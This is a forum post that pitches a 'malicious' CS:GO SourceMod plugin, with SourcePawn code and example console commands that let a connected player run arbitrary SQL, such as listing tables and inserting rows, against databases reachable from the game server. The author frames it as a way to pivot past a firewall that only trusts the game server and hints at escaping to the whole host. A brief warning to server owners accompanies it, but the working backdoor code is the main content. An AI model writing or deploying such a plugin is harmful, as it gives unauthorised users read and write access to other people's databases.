You want your plugin to become Malicious? You want anyone to gain access over everything? SQL server firewall'ed? No Problem! Introducing all new!
So what this kinda shows is how a CS:GO server can be used as a VPN into a SQL server. Some SQL servers have a firewall to only allow inbound connections from a cs:go server, but this show you how to manipulate it.
So - at the end of the day - be very aware of who and what you give users to in your servers. There could theoretically a way to actually leave the confinement of the CS:GO server and access the whole VPS / Dedi entirely, but I haven't got up to that yet : ^)
Note: PrintToConsole has a limit on how much it can print, I could have it push to a stack and print a few at a time until it's all printed, but you can figure that one out : ^)
Some notable commands:
Code:
sm_test "example" "show tables;"
sm_test "example" "desc a_table_name;"
sm_test "example" "INSERT INTO exampe_example VALUES ('STEAM_1:1:1111', 100, 0.1, 'more text');"
PHP Code:
public Action command_test(int I_Client, int I_Args) {
char C_Server[64], C_Statement[512], C_Error[512];
GetCmdArg(1, C_Server, sizeof(C_Server));
GetCmdArg(2, C_Statement, sizeof(C_Statement));
Database New = SQL_Connect(C_Server, true, C_Error, sizeof(C_Error));
if (New != INVALID_HANDLE) {
PrintToChat(I_Client, "Connection To %s Successful", C_Server);
SQL_TQuery(New, sqlTest, C_Statement, GetClientUserId(I_Client), DBPrio_High);
PrintToChat(I_Client, "Executing: %s", C_Statement);
} else {
PrintToChat(I_Client, "Error: %s", C_Error);
}
return Plugin_Handled;
}
public void sqlTest(Handle owner, Handle hndl, char[] error, int I_UserID) {
char C_buffer[512], C_String[512], C_FieldName[64];
int I_Client = GetClientOfUserId(I_UserID);
if (IsClientInGame(I_Client)) {
if (hndl != INVALID_HANDLE) {
PrintToChat(I_Client, "Executed");
if (SQL_GetRowCount(hndl) > 0) {
int I_Fields = SQL_GetFieldCount(hndl);
for (int i = 0; i < I_Fields; i++) {
SQL_FieldNumToName(hndl, i, C_FieldName, sizeof(C_FieldName));
Format(C_buffer, sizeof(C_buffer), "%s%s: ", C_buffer, C_FieldName);
}
PrintToConsole(I_Client, C_buffer);
Format(C_buffer, sizeof(C_buffer), "");
while (SQL_FetchRow(hndl)) {
for (int i = 0; i < I_Fields; i++) {
SQL_FetchString(hndl, i, C_String, sizeof(C_String));
Format(C_buffer, sizeof(C_buffer), "%s%s, ", C_buffer, C_String);
}
PrintToConsole(I_Client, C_buffer);
Format(C_buffer, sizeof(C_buffer), "");
}
}
} else {
PrintToChat(I_Client, error);
}
}
}
Example Taken From TangoTimer:
__________________